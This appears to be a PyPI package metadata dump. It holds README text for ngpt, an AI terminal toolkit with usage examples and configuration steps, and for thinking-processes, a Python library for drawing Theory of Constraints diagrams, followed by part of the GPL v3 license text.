# Session management improvements:
# - Commands like preview, load, rename, delete now default to the latest session
# - Example: 'load' (loads the latest session) vs 'load 2' (loads session at index 2)
# Return response without streaming
ngpt --plaintext "Tell me about quantum computing"
# Generate code
ngpt --code "function to calculate the Fibonacci sequence"
# Generate code with real-time syntax highlighting (default)
ngpt --code "function to calculate the Fibonacci sequence"
# Generate code without streaming or markdown rendering
ngpt --code --plaintext "function to calculate the Fibonacci sequence"
# Generate and execute shell commands
ngpt --shell "list all files in the current directory"
# Read from stdin and use the content in your prompt
echo "What is this text about?" | ngpt --pipe "Analyze the following text: {}"
# Use interactive multiline editor to enter a command description (when no argument is provided)
ngpt -s
# Use interactive multiline editor to enter code description (when no argument is provided)
ngpt -c
# Pipe a command description to shell mode
echo "list all files" | ngpt -s
# Pipe a code description to code mode
echo "create a python request" | ngpt -c --language python
# Using here-string (<<<) for quick single-line input
ngpt --pipe {} <<< "What is the best way to learn shell redirects?"
# Using standard input redirection to process file contents
ngpt --pipe "summarise {}" < README.md
# Using here-document (<<EOF) for multiline input
ngpt --pipe {} << EOF
What is the best way to learn Golang?
Provide simple hello world example.
EOF
# Create a custom role for specialized tasks
ngpt --role-config create json_generator
# Use a custom role for specific tasks
ngpt --role json_generator "Generate user data with name, email, and address"
# Use a role from the Role Gallery (first create it, then use it)
ngpt --role-config create sql_expert
# Paste the SQL Expert role from https://nazdridoy.github.io/ngpt/examples/role-gallery/
ngpt --role sql_expert "Write a query to find all users who made a purchase in the last 30 days"
# Rewrite text to improve quality while preserving tone and meaning
echo "your text" | ngpt -r
# Rewrite text from a command-line argument
ngpt -r "your text to rewrite"
# Use interactive multiline editor if no argument is provided
ngpt -r
# Rewrite text from a file
cat file.txt | ngpt -r
# Generate AI-powered git commit messages for staged changes
ngpt -g
# Generate commit message from staged changes with a context directive
ngpt -g --preprompt "type:feat"
# Process large diffs in chunks with recursive analysis
ngpt -g --rec-chunk
# Process a diff file instead of staged changes
ngpt -g --diff /path/to/changes.diff
# Use piped diff content for commit message generation
git diff HEAD~1 | ngpt -g --pipe
# Generate a commit message with logging for debugging
ngpt -g --log commit_log.txt
# Use interactive multiline editor to enter text to rewrite
ngpt -r
# Display markdown responses with real-time formatting (default)
ngpt "Explain markdown syntax with examples"
# Display responses without markdown rendering
ngpt --plaintext "Explain markdown syntax with examples"
# Use multiline editor for complex prompts
ngpt --text
# Use custom system prompt
ngpt --preprompt "You are a Linux expert" "How do I find large files?"
# Log your conversation to a file
ngpt --interactive --log conversation.log
# Create a temporary log file automatically
ngpt --log "Tell me about quantum computing"
# Process text from stdin using the {} placeholder
cat README.md | ngpt --pipe "Summarize this document: {}"
# Use different model providers by specifying the provider name
ngpt --provider Groq "Explain quantum computing"
# Compare outputs from different providers
ngpt --provider OpenAI --plaintext "Explain quantum physics" > openai_response.txt
ngpt --provider Ollama --plaintext "Explain quantum physics" > ollama_response.txt
# Show all API configurations
ngpt --show-config --all
# List available models for the active configuration
ngpt --list-models
# List models for a specific configuration (index)
ngpt --list-models --config-index 1
# List models for a specific configuration (provider)
ngpt --list-models --provider Gemini
# With custom options
ngpt --api-key your-key --base-url http://your-endpoint --model your-model "Hello"
# Enable web search capability to enhance prompts with web information
ngpt --web-search "What's the latest news about AI?"
# Generate and execute shell commands (using -s or --shell flag)
# OS-aware: generates appropriate commands for Windows, macOS, or Linux
ngpt -s "list all files in current directory"
# On Windows generates: dir
# On Linux/macOS generates: ls -la
# Generate code (using -c or --code flag)
ngpt -c "create a python function that calculates fibonacci numbers"
# Use multiline text editor for complex prompts (using -t or --text flag)
ngpt -t
```
For more examples and detailed usage, visit the [CLI Usage Guide](https://nazdridoy.github.io/ngpt/usage/cli_usage/).
## Usage
### Command Line Options
```console
❯ ngpt -h
usage: ngpt [-h] [-v] [--api-key API_KEY] [--base-url BASE_URL] [--model MODEL] [--web-search] [--pipe]
[--temperature TEMPERATURE] [--top_p TOP_P] [--max_tokens MAX_TOKENS] [--log [FILE]]
[--preprompt PREPROMPT | --role ROLE] [--config [CONFIG]] [--config-index CONFIG_INDEX]
[--provider PROVIDER] [--remove] [--show-config] [--list-models] [--cli-config [COMMAND ...]]
[--role-config [ACTION ...]] [--plaintext] [--language LANGUAGE] [--rec-chunk] [--diff [FILE]]
[--chunk-size CHUNK_SIZE] [--analyses-chunk-size ANALYSES_CHUNK_SIZE] [--max-msg-lines MAX_MSG_LINES]
[--max-recursion-depth MAX_RECURSION_DEPTH] [--humanize] [-i | -s | -c | -t | -r | -g]
[prompt]
nGPT - AI-powered terminal toolkit for code, commits, commands & chat
positional arguments::
[PROMPT] The prompt to send to the language model
Global Options::
-h, --help show this help message and exit
-v, --version Show version information and exit
--api-key API_KEY API key for the service
--base-url BASE_URL Base URL for the API
--model MODEL Model to use
--web-search Enable web search capability using DuckDuckGo to enhance prompts with relevant
information
--pipe Read from stdin and use content with prompt. Use {} in prompt as placeholder
for stdin content. Can be used with any mode option except --text and
--interactive
--temperature TEMPERATURE Set temperature (controls randomness, default: 0.7)
--top_p TOP_P Set top_p (controls diversity, default: 1.0)
--max_tokens MAX_TOKENS Set max response length in tokens
--log [FILE] Set filepath to log conversation to, or create a temporary log file if no path
provided
--preprompt PREPROMPT Set custom system prompt to control AI behavior
--role ROLE Use a predefined role to set system prompt (mutually exclusive with
--preprompt)
Configuration Options::
--config [CONFIG] Path to a custom config file or, if no value provided, enter interactive
configuration mode to create a new config
--config-index CONFIG_INDEX Index of the configuration to use or edit (default: 0)
--provider PROVIDER Provider name to identify the configuration to use
--remove Remove the configuration at the specified index (requires --config and
--config-index or --provider)
--show-config Show the current configuration(s) and exit
--list-models List all available models for the current configuration and exit
--cli-config [COMMAND ...] Manage CLI configuration (set, get, unset, list, help)
--role-config [ACTION ...] Manage custom roles (help, create, show, edit, list, remove) [role_name]
Output Display Options::
--plaintext Disable streaming and markdown rendering (plain text output)
Code Mode Options::
--language LANGUAGE Programming language to generate code in (for code mode)
Git Commit Message Options::
--rec-chunk Process large diffs in chunks with recursive analysis if needed
--diff [FILE] Use diff from specified file instead of staged changes. If used without a path,
uses the path from CLI config.
--chunk-size CHUNK_SIZE Number of lines per chunk when chunking is enabled (default: 200)
--analyses-chunk-size ANALYSES_CHUNK_SIZE
Number of lines per chunk when recursively chunking analyses (default: 200)
--max-msg-lines MAX_MSG_LINES Maximum number of lines in commit message before condensing (default: 20)
--max-recursion-depth MAX_RECURSION_DEPTH
Maximum recursion depth for commit message condensing (default: 3)
Rewrite Mode Options::
--humanize Transform AI-generated text into human-like content that passes AI detection
tools
Modes (mutually exclusive)::
-i, --interactive Start an interactive chat session
-s, --shell Generate and execute shell commands
-c, --code Generate code
-t, --text Enter multi-line text input (submit with Ctrl+D)
-r, --rewrite Rewrite text from stdin to be more natural while preserving tone and meaning
-g, --gitcommsg Generate AI-powered git commit messages from staged changes or diff file
```
> **Note**: For better visualization of conventional commit messages on GitHub, you can use the [GitHub Commit Labels](https://greasyfork.org/en/scripts/526153-github-commit-labels) userscript, which adds colorful labels to your commits.
For a complete reference of all available options, detailed CLI examples and usage information, see the [CLI Usage Guide](https://nazdridoy.github.io/ngpt/usage/cli_usage/).
## Documentation
Comprehensive documentation, including usage guides and examples, is available at:
**[https://nazdridoy.github.io/ngpt/](https://nazdridoy.github.io/ngpt/)**
Key documentation sections:
- [Installation Guide](https://nazdridoy.github.io/ngpt/installation/)
- [CLI Usage Guide](https://nazdridoy.github.io/ngpt/usage/cli_usage/)
- [Configuration Guide](https://nazdridoy.github.io/ngpt/configuration/)
- [Custom Roles Guide](https://nazdridoy.github.io/ngpt/usage/roles/)
- [Role Gallery](https://nazdridoy.github.io/ngpt/examples/role-gallery/)
- [Examples & Tutorials](https://nazdridoy.github.io/ngpt/examples/basic/)
- [Git Commit Message Guide](https://nazdridoy.github.io/ngpt/usage/gitcommsg/)
## Configuration
### API Key Setup
#### OpenAI API Key
1. Create an account at [OpenAI](https://platform.openai.com/)
2. Navigate to API keys: https://platform.openai.com/api-keys
3. Click "Create new secret key" and copy your API key
4. Configure nGPT with your key:
```bash
ngpt --config
# Enter provider: OpenAI
# Enter API key: your-openai-api-key
# Enter base URL: https://api.openai.com/v1/
# Enter model: gpt-3.5-turbo (or other model)
```
#### Google Gemini API Key
1. Create or use an existing Google account
2. Go to [Google AI Studio](https://aistudio.google.com/)
3. Navigate to API keys in the left sidebar (or visit https://aistudio.google.com/app/apikey)
4. Create an API key and copy it
5. Configure nGPT with your key:
```bash
ngpt --config
# Enter provider: Gemini
# Enter API key: your-gemini-api-key
# Enter base URL: https://generativelanguage.googleapis.com/v1beta/openai
# Enter model: gemini-2.0-flash
```
For more detailed information, refer to the [API Key Setup documentation](https://nazdridoy.github.io/ngpt/configuration/#api-key-setup).
### CLI Configuration
NGPT offers a CLI configuration system that allows you to set default values for command-line options. This is especially useful when you:
- Repeatedly use the same provider or model
- Have preferred settings for specific tasks
- Want to create different workflows based on context
For example, setting your preferred language for code generation or temperature value means you won't have to specify these parameters each time:
```console
❯ uv run ngpt --cli-config help
CLI Configuration Help:
Command syntax:
ngpt --cli-config help - Show this help message
ngpt --cli-config set OPTION VALUE - Set a default value for OPTION
ngpt --cli-config get OPTION - Get the current value of OPTION
ngpt --cli-config get - Show all CLI configuration settings
ngpt --cli-config unset OPTION - Remove OPTION from configuration
ngpt --cli-config list - List all available options with types and defaults
Available options:
General options (all modes):
config-index - Type: int (default: 0)
log - Type: str (default: None)
max_tokens - Type: int (default: None)
preprompt - Type: str (default: None)
provider - Type: str (default: None)
temperature - Type: float (default: 0.7)
top_p - Type: float (default: 1.0)
web-search - Type: bool (default: False)
Code mode options (-c/--code):
language - Type: str (default: python)
Git commit message options (-g/--gitcommsg):
analyses-chunk-size - Type: int (default: 200)
chunk-size - Type: int (default: 200)
diff - Type: str (default: None)
max-msg-lines - Type: int (default: 20)
max-recursion-depth - Type: int (default: 3)
rec-chunk - Type: bool (default: False)
Example usage:
ngpt --cli-config set language java - Set default language to java for code generation
ngpt --cli-config set temperature 0.9 - Set default temperature to 0.9
ngpt --cli-config set recursive-chunk true - Enable recursive chunking for git commit messages
ngpt --cli-config set diff /path/to/file.diff - Set default diff file for git commit messages
ngpt --cli-config get temperature - Check the current temperature setting
ngpt --cli-config get - Show all current CLI settings
ngpt --cli-config unset language - Remove language setting
Notes:
- CLI configuration is stored in:
• Linux: ~/.config/ngpt/ngpt-cli.conf
• macOS: ~/Library/Application Support/ngpt/ngpt-cli.conf
• Windows: %APPDATA%\ngpt\ngpt-cli.conf
- Settings are applied based on context (e.g., language only applies to code generation mode)
- Command-line arguments always override CLI configuration
- Some options are mutually exclusive and will not be applied together
```
For more details, see the [CLI Configuration Guide](https://nazdridoy.github.io/ngpt/usage/cli_config/).
### Interactive Configuration
The `--config` option without arguments enters interactive configuration mode, allowing you to add or edit configurations:
```bash
# Add a new configuration
ngpt --config
# Edit an existing configuration at index 1
ngpt --config --config-index 1
# Edit an existing configuration by provider name
ngpt --config --provider Gemini
# Remove a configuration at index 2
ngpt --config --remove --config-index 2
# Remove a configuration by provider name
ngpt --config --remove --provider Gemini
# Use a specific configuration by provider name
ngpt --provider OpenAI "Tell me about quantum computing"
```
In interactive mode:
- When editing an existing configuration, press Enter to keep the current values
- When creating a new configuration, press Enter to use default values
- For security, your API key is not displayed when editing configurations
- When removing a configuration, you'll be asked to confirm before deletion

For more details on configuring nGPT, see the [Configuration Guide](https://nazdridoy.github.io/ngpt/configuration/).
### Configuration File
nGPT uses a configuration file stored in the standard user config directory for your operating system:
- **Linux**: `~/.config/ngpt/ngpt.conf` or `$XDG_CONFIG_HOME/ngpt/ngpt.conf`
- **macOS**: `~/Library/Application Support/ngpt/ngpt.conf`
- **Windows**: `%APPDATA%\ngpt\ngpt.conf`
The configuration file uses a JSON list format, allowing you to store multiple configurations. You can select which configuration to use with the `--config-index` argument (or by default, index 0 is used).
#### Multiple Configurations Example (`ngpt.conf`)
```json
[
{
"api_key": "your-openai-api-key-here",
"base_url": "https://api.openai.com/v1/",
"provider": "OpenAI",
"model": "gpt-4o"
},
{
"api_key": "your-groq-api-key-here",
"base_url": "https://api.groq.com/openai/v1/",
"provider": "Groq",
"model": "llama3-70b-8192"
},
{
"api_key": "your-ollama-key-if-needed",
"base_url": "http://localhost:11434/v1/",
"provider": "Ollama-Local",
"model": "llama3"
}
]
```
For details on the configuration file format and structure, see the [Configuration Guide](https://nazdridoy.github.io/ngpt/configuration/).
### Configuration Priority
nGPT determines configuration values in the following order (highest priority first):
1. Command line arguments (`--api-key`, `--base-url`, `--model`, etc.)
2. Environment variables (`OPENAI_API_KEY`, `OPENAI_BASE_URL`, `OPENAI_MODEL`)
3. CLI configuration file (`ngpt-cli.conf`, managed with `--cli-config`)
4. Main configuration file `ngpt.conf` or `custom-config-file`
5. Default values
**Tip:** Use `ngpt --show-config` to see which configuration values are being used and their sources (command-line arguments, environment variables, or configuration file).
### Real-World Demonstrations with nGPT
Let's see nGPT in action! Here are some practical ways you can use it every day:
#### Quick Q&A and Coding
```bash
# Get a quick explanation
ngpt "Explain the difference between threads and processes in Python"
# Generate code with real-time syntax highlighting
ngpt --code "Write a Python function to reverse a linked list"
```
With the `--code` flag, nGPT gives you clean code without explanations or markdown, just what you need to copy and paste into your project. By default, it shows real-time syntax highlighting as the code comes in.
#### Shell Command Generation (OS-Aware)
```bash
# Let nGPT generate the correct command for your OS
ngpt --shell "list all files in the current directory including hidden ones"
# Or use the multiline editor if you have a complex request
ngpt -s
# On Linux/macOS: ls -la
# On Windows: dir /a
```
One of my favorite features! No more Googling obscure command flags, nGPT generates the right command for your operating system. It'll even execute it for you if you approve.

#### Text Rewriting and Summarization
```bash
# Pipe text to rewrite it (e.g., improve clarity)
echo "This is a rough draft of my email." | ngpt -r
# Summarize a file using the pipe placeholder
cat long-article.txt | ngpt --pipe "Summarize this document concisely: {}"
```
The text rewriting feature is perfect for quickly improving documentation, emails, or reports. And with pipe placeholders, you can feed in content from files or other commands.
#### Git Commit Message Generation
```bash
# Stage your changes
git add .
# Let nGPT generate a conventional commit message based on the diff
ngpt -g
# Generate git commit message from a diff file
ngpt -g --diff changes.diff
```
This is a huge time-saver. nGPT analyzes your git diff and generates a properly formatted conventional commit message that actually describes what you changed. No more staring at the blank commit message prompt!

#### Custom AI Roles
```bash
# Create a specialized role for JSON generation
ngpt --role-config create json_generator
# Use the custom role to generate structured data
ngpt --role json_generator "Generate random user profile data"
```
```json
{
"id": "a1b2c3d4-e5f6-7890-1234-567890abcdef",
"firstName": "Aurora",
"lastName": "Reynolds",
"email": "aurora.reynolds@example.com",
"phone": "+1-555-0101",
"address": {
"street": "123 Main St",
"city": "Anytown",
"state": "CA",
"zipCode": "90210"
},
"birthDate": "1990-07-15",
"registrationDate": "2022-01-20",
"isActive": true,
"roles": [
"user",
"premium"
]
}
```
Custom roles allow you to create reusable AI personas for consistent responses across various prompts. For more details, see the [Custom Roles Guide](https://nazdridoy.github.io/ngpt/usage/roles/) and check out the [Role Gallery](https://nazdridoy.github.io/ngpt/examples/role-gallery/) for ready-to-use roles.
#### Web Search Integration
```bash
# Ask questions that require up-to-date information
ngpt --web-search "What's the latest news about AI regulation?"
```
The `--web-search` flag lets nGPT consult the web for recent information, making it useful for questions about current events or topics that might have changed since the AI's training data cutoff.

### Real-World Integration Examples
Let's look at how nGPT can fit into your everyday workflow with some practical examples:
#### Developer Workflow
As a developer, I use nGPT throughout my day:
**Morning code review**:
```bash
# Get explanations of complex code
git show | ngpt --pipe "Explain what this code change does and any potential issues: {}"
```
**Debugging help**:
```bash
# Help understand a cryptic error message
npm run build 2>&1 | grep Error | ngpt --pipe "What does this error mean and how can I fix it: {}"
```
**Documentation generation**:
```bash
# Generate JSDoc comments for functions
cat src/utils.js | ngpt --pipe "Write proper JSDoc comments for these functions: {}"
```
**Commit messages**:
```bash
# After finishing a feature
git add .
ngpt -g
```
#### Writer's Assistant
For content creators and writers:
**Overcoming writer's block**:
```bash
ngpt "Give me 5 different angles to approach an article about sustainable technology"
```
**Editing assistance**:
```bash
cat draft.md | ngpt -r
```
**Research summaries**:
```bash
curl -s https://example.com/research-paper.html | ngpt --pipe "Summarize the key findings from this research: {}"
```
#### System Administrator
For sysadmins and DevOps folks:
**Generating complex commands**:
```bash
ngpt -s "find all log files larger than 100MB that haven't been modified in the last 30 days"
```
*Creating configuration files**:
```bash
ngpt --code "Create a Docker Compose file for a Redis, PostgreSQL, and Node.js application"
```
**Troubleshooting systems**:
```bash
dmesg | tail -50 | ngpt --pipe "Explain what might be causing the issues based on these system logs: {}"
```
## Contributing
We welcome contributions to nGPT! Whether it's bug fixes, feature additions, or documentation improvements, your help is appreciated.
To contribute:
1. Fork the repository
2. Create a feature branch: `git checkout -b feature/your-feature-name`
3. Make your changes
4. Commit with clear messages following conventional commit guidelines
5. Push to your fork and submit a pull request
Please check the [CONTRIBUTING.md](CONTRIBUTING.md) file for detailed guidelines on code style, pull request process, and development setup.
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
| text/markdown | null | nazDridoy <nazdridoy399@gmail.com> | null | null | MIT | ai, api-client, chatbot, chatgpt, claude, cli, cli-tool, code-generation, git-commit, gpt, groq, llm, markdown-rendering, ollama, openai, shell-commands, text-rewriting | [
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: End Users/Desktop",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Communications :: Chat",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"beautifulsoup4>=4.12.0",
"prompt-toolkit>=3.0.0",
"pyperclip>=1.8.0",
"requests>=2.31.0",
"rich>=10.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/nazdridoy/ngpt",
"Repository, https://github.com/nazdridoy/ngpt",
"Bug Tracker, https://github.com/nazdridoy/ngpt/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:38:09.829873 | ngpt-6.8.0.tar.gz | 693,969 | 66/4b/05a1c4f37a1e560023d656192f7702099bf26b4ad63f52d50cbaad866b55/ngpt-6.8.0.tar.gz | source | sdist | null | false | ffaa448b2d9f467f43d25c5092a5b6f9 | 49bbd1ff8771499b77dba0915e88afaa0b1210f2b73b261f2088c749edf382c2 | 664b05a1c4f37a1e560023d656192f7702099bf26b4ad63f52d50cbaad866b55 | null | [
"LICENSE"
] | 221 |
2.4 | thinking-processes | 1.5.1 | Diagramming tools for the Thinking Processes from the Theory of Constraints | # Thinking Processes
This Python package helps you to draw diagrams used in the Thinking Processes from the Theory of Constraints.
For more information, see https://en.wikipedia.org/wiki/Thinking_processes_(theory_of_constraints)
### Prerequisites
- Python 3.11+
- Ensure [Graphviz](https://www.graphviz.org/) is installed and available in your PATH.
### Installing
```bash
pip install thinking-processes
```
### Current Reality Tree
In this example, we find root causes for undesired effects by drawing a Current Reality Tree:
```python
from thinking_processes import CurrentRealityTree
crt = CurrentRealityTree()
engine_not_start = crt.add_node("Car's engine will not start")
engine_needs_fuel = crt.add_node('Engine needs fuel in order to run')
no_fuel_to_engine = crt.add_node('Fuel is not getting to the engine')
water_in_fuel_line = crt.add_node('There is water in the fuel line')
crt.add_causal_relation([engine_needs_fuel, no_fuel_to_engine], engine_not_start)
crt.add_causal_relation([water_in_fuel_line], no_fuel_to_engine)
air_conditioning_not_working = crt.add_node('Air conditioning is not working')
air_not_circulating = crt.add_node('Air is not able to circulate')
air_intake_full_of_water = crt.add_node('The air intake is full of water')
crt.add_causal_relation([air_not_circulating], air_conditioning_not_working)
crt.add_causal_relation([air_intake_full_of_water], air_not_circulating)
radio_distorted = crt.add_node('Radio sounds distorted')
speakers_obstructed = crt.add_node('The speakers are obstructed')
speakers_underwater = crt.add_node('The speakers are underwater')
crt.add_causal_relation([speakers_obstructed], radio_distorted)
crt.add_causal_relation([speakers_underwater], speakers_obstructed)
car_in_pool = crt.add_node('The car is in the swimming pool')
crt.add_causal_relation([car_in_pool], speakers_underwater)
crt.add_causal_relation([car_in_pool], air_intake_full_of_water)
crt.add_causal_relation([car_in_pool], water_in_fuel_line)
handbreak_faulty = crt.add_node('The handbreak is faulty')
handbreak_stops_car = crt.add_node('The handbreak stops the car from rolling into the swimming pool')
crt.add_causal_relation([handbreak_faulty, handbreak_stops_car], car_in_pool)
crt.plot(view=True, filepath='crt.png')
```
The resulting tree looks like this:

To save some effort in typing, you can create the same diagram using a string representation of the tree:
```python
from thinking_processes import CurrentRealityTree
crt = CurrentRealityTree.from_string("""
1: Car's engine will not start
2: Engine needs fuel in order to run
3: Fuel is not getting to the engine
4: There is water in the fuel line
5: Air conditioning is not working
6: Air is not able to circulate
7: The air intake is full of water
8: Radio sounds distorted
9: The speakers are obstructed
10: The speakers are underwater
11: The car is in the swimming pool
12: The handbreak is faulty
13: The handbreak stops the car\nfrom rolling into the swimming pool
2,3 -> 1
4 -> 3
6 => 5
7 -> 6
9 -> 8
10 -> 9
10 <= 11
11 <- 12 13
11 -> 7
11 -> 4
""")
```
### Evaporating Cloud (Conflict Resolution Diagram)
In this example, we resolve a conflict by identifying wrong assumptions behind the conflict:
```python
from thinking_processes import EvaporatingCloud
ec = EvaporatingCloud(
objective='Reduce cost per unit',
need_a='Reduce setup cost per unit',
need_b='Reduce carrying cost per unit',
conflict_part_a='Run larger batches',
conflict_part_b='Run smaller batches'
)
ec.add_assumption_on_the_conflict('small is the opposite of large', is_true=True)
ec.add_assumption_on_the_conflict('there is only one meaning to the word "batch"', is_true=False)
ec.add_assumption_on_need_a("setup cost is fixed and can't be reduced")
ec.add_assumption_on_need_a("the machine being set up is a bottleneck with no spare capacity")
ec.add_assumption_on_need_b("smaller batches reduce carrying cost")
ec.plot(view=True, filepath='ec.png')
```
The resulting diagram looks like this:

### Prerequisite Tree
In this example, we identify and overcome obstacles to achieve a goal:
```python
from thinking_processes import PrerequisiteTree
prt = PrerequisiteTree(objective='Repair the handbrake')
missing_knowledge = prt.add_obstacle('Cannot repair the handbrake')
learn = missing_knowledge.add_solution('Learn to repair the handbrake')
learn.add_obstacle('No time to learn')
let_repair = missing_knowledge.add_solution('Let someone else repair the handbrake')
no_money = let_repair.add_obstacle('No money to let repair the handbrake')
no_money.add_solution('Save money')
prt.plot(view=True, filepath='prt.png')
```
The resulting diagram looks like this:

Alternatively, you can create the same diagram using a string representation of the tree:
```python
from thinking_processes import PrerequisiteTree
prt = PrerequisiteTree.from_string("""
Repair the handbreak
Cannot repair the handbreak
Learn to repair the handbreak
No time to learn
Let someone repair the handbreak
No money
Save money
""")
```
## Development
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
### Running the tests
All tests in the "tests" directory are based on the unittest package.
### Deployment
```bash
rm -R dist thinking_processes.egg-info
python -m build && twine upload --skip-existing --verbose dist/*
```
You should also create a tag for the current version
```bash
git tag -a [version] -m "describe what has changed"
git push --tags
```
## Versioning
We use [SemVer](http://semver.org/) for versioning.
## Authors
If you have any questions, feel free to ask one of our authors:
* **Boris Wiegand** - boris.wiegand@stahl-holding-saar.de
| text/markdown | null | Boris Wiegand <boris.wiegand@stahl-holding-saar.de> | null | null | GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/> Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no 